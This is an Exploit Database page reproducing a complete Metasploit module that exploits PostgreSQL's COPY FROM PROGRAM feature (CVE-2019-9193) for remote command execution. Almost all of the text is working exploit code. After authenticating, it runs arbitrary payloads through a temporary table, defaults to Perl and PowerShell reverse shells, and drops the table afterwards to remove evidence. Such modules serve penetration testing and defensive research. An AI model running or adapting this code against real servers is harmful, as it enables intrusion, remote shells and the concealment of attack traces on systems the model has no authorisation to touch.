PostgreSQL 9.3 – COPY FROM PROGRAM Command Execution (Metasploit)

• Exploit Database
• 13 阅读

• 作者： Metasploit
  日期： 2019-05-08
• 类别：

  • remote
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/46813/

• \##
  # This module requires Metasploit: https://metasploit.com/download
  # Current source: https://github.com/rapid7/metasploit-framework
  ##
  
  require 'msf/core/exploit/postgres'
  
  class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  
  include Msf::Exploit::Remote::Postgres
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Report
  
  def initialize(info = {})
  super(update_info(info,
  'Name' => 'PostgreSQL COPY FROM PROGRAM Command Execution',
  'Description' => %q(
  Installations running Postgres 9.3 and above have functionality which allows for the superuser
  and users with 'pg_execute_server_program' to pipe to and from an external program using COPY.
  This allows arbitrary command execution as though you have console access.
  
  This module attempts to create a new table, then execute system commands in the context of
  copying the command output into the table.
  
  This module should work on all Postgres systems running version 9.3 and above.
  
  For Linux & OSX systems, target 1 is used with cmd payloads such as: cmd/unix/reverse_perl
  
  For Windows Systems, target 2 is used with powershell payloads such as: cmd/windows/powershell_reverse_tcp
  Alternativly target 3 can be used to execute generic commands, such as a web_delivery meterpreter powershell payload
  or other customised command.
  ),
  'Author' => [
  'Jacob Wilkin' # Exploit Author of Module
  ],
  'License' => MSF_LICENSE,
  'References' => [
  ['CVE', '2019-9193'],
  ['URL', 'https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5'],
  ['URL', 'https://www.postgresql.org/docs/9.3/release-9-3.html'] #Patch notes adding the function, see 'E.26.3.3. Queries - Add support for piping COPY and psql \copy data to/from an external program (Etsuro Fujita)'
  ],
  'PayloadType' => 'cmd',
  'Platform' => %w(linux unix win osx),
  'Payload' => {
  },
  'Arch' => [ARCH_CMD],
  'Targets'=>
  [
  [
  'Unix/OSX/Linux', {
  'Platform' => 'unix',
  'Arch' => ARCH_CMD,
  'DefaultOptions' => {
  'Payload' => 'cmd/unix/reverse_perl' }
  }
  ],[
  'Windows - PowerShell (In-Memory)', {
  'Platform' => 'windows',
  'Arch' => ARCH_CMD,
  'DefaultOptions' => {
  'Payload' => 'cmd/windows/powershell_reverse_tcp' }
  }
  ],[
  'Windows (CMD)',
  'Platform' => 'win',
  'Arch' => [ARCH_CMD],
  'Payload' => {
  'Compat' => {
  'PayloadType' => 'cmd',
  'RequiredCmd' => 'adduser, generic'
  }
  }
  ],
  ],
  'DisclosureDate' => 'Mar 20 2019'
  ))
  
  register_options([
  Opt::RPORT(5432),
  OptString.new('TABLENAME', [ true, 'A table name that does not exist (To avoid deletion)', Rex::Text.rand_text_alphanumeric(8..12)]),
  OptBool.new('DUMP_TABLE_OUTPUT', [false, 'select payload command output from table (For Debugging)', false])
  ])
  
  deregister_options('SQL', 'RETURN_ROWSET', 'VERBOSE')
  end
  
  # Return the datastore value of the same name
  # @return [String] tablename for table to use with command execution
  def tablename
  datastore['TABLENAME']
  end
  
  def check
  vuln_version? ? CheckCode::Appears : CheckCode::Safe
  end
  
  def vuln_version?
  version = postgres_fingerprint
  return false unless version[:auth]
  vprint_status version[:auth].to_s
  version_full = version[:auth].to_s.scan(/^PostgreSQL ([\d\.]+)/).flatten.first
  if Gem::Version.new(version_full) >= Gem::Version.new('9.3')
  return true
  else
  return false
  end
  end
  
  def login_success?
  status = do_login(username, password, database)
  case status
  when :noauth
  print_error "#{peer} - Authentication failed"
  return false
  when :noconn
  print_error "#{peer} - Connection failed"
  return false
  else
  print_status "#{peer} - #{status}"
  return true
  end
  end
  
  def execute_payload
  # Drop table if it exists
  query = "DROP TABLE IF EXISTS #{tablename};"
  drop_query = postgres_query(query)
  case drop_query.keys[0]
  when :conn_error
  print_error "#{peer} - Connection error"
  return false
  when :sql_error
  print_warning "#{peer} - Unable to execute query: #{query}"
  return false
  when :complete
  print_good "#{peer} - #{tablename} dropped successfully"
  else
  print_error "#{peer} - Unknown"
  return false
  end
  
  # Create Table
  query = "CREATE TABLE #{tablename}(filename text);"
  create_query = postgres_query(query)
  case create_query.keys[0]
  when :conn_error
  print_error "#{peer} - Connection error"
  return false
  when :sql_error
  print_warning "#{peer} - Unable to execute query: #{query}"
  return false
  when :complete
  print_good "#{peer} - #{tablename} created successfully"
  else
  print_error "#{peer} - Unknown"
  return false
  end
  
  # Copy Command into Table
  cmd_filtered = payload.encoded.gsub("'", "''")
  query = "COPY #{tablename} FROM PROGRAM '#{cmd_filtered}';"
  copy_query = postgres_query(query)
  case copy_query.keys[0]
  when :conn_error
  print_error "#{peer} - Connection error"
  return false
  when :sql_error
  print_warning "#{peer} - Unable to execute query: #{query}"
  if copy_query[:sql_error] =~ /must be superuser to COPY to or from an external program/
  print_error 'Insufficient permissions, User must be superuser or in pg_read_server_files group'
  return false
  end
  print_warning "#{peer} - Unable to execute query: #{query}"
  return false
  when :complete
  print_good "#{peer} - #{tablename} copied successfully(valid syntax/command)"
  else
  print_error "#{peer} - Unknown"
  return false
  end
  
  if datastore['DUMP_TABLE_OUTPUT']
  # Select output from table for debugging
  query = "SELECT * FROM #{tablename};"
  select_query = postgres_query(query)
  case select_query.keys[0]
  when :conn_error
  print_error "#{peer} - Connection error"
  return false
  when :sql_error
  print_warning "#{peer} - Unable to execute query: #{query}"
  return false
  when :complete
  print_good "#{peer} - #{tablename} contents:\n#{select_query}"
  return true
  else
  print_error "#{peer} - Unknown"
  return false
  end
  end
  # Clean up table evidence
  query = "DROP TABLE IF EXISTS #{tablename};"
  drop_query = postgres_query(query)
  case drop_query.keys[0]
  when :conn_error
  print_error "#{peer} - Connection error"
  return false
  when :sql_error
  print_warning "#{peer} - Unable to execute query: #{query}"
  return false
  when :complete
  print_good "#{peer} - #{tablename} dropped successfully(Cleaned)"
  else
  print_error "#{peer} - Unknown"
  return false
  end
  end
  
  def do_login(user, pass, database)
  begin
  password = pass || postgres_password
  result = postgres_fingerprint(
  db: database,
  username: user,
  password: password
  )
  
  return result[:auth] if result[:auth]
  print_error "#{peer} - Login failed"
  return :noauth
  
  rescue Rex::ConnectionError
  return :noconn
  end
  end
  
  def exploit
  #vuln_version doesn't seem to work
  #return unless vuln_version?
  return unless login_success?
  print_status("Exploiting...")
  if execute_payload
  print_status("Exploit Succeeded")
  else
  print_error("Exploit Failed")
  end
  postgres_logout if @postgres_conn
  end
  end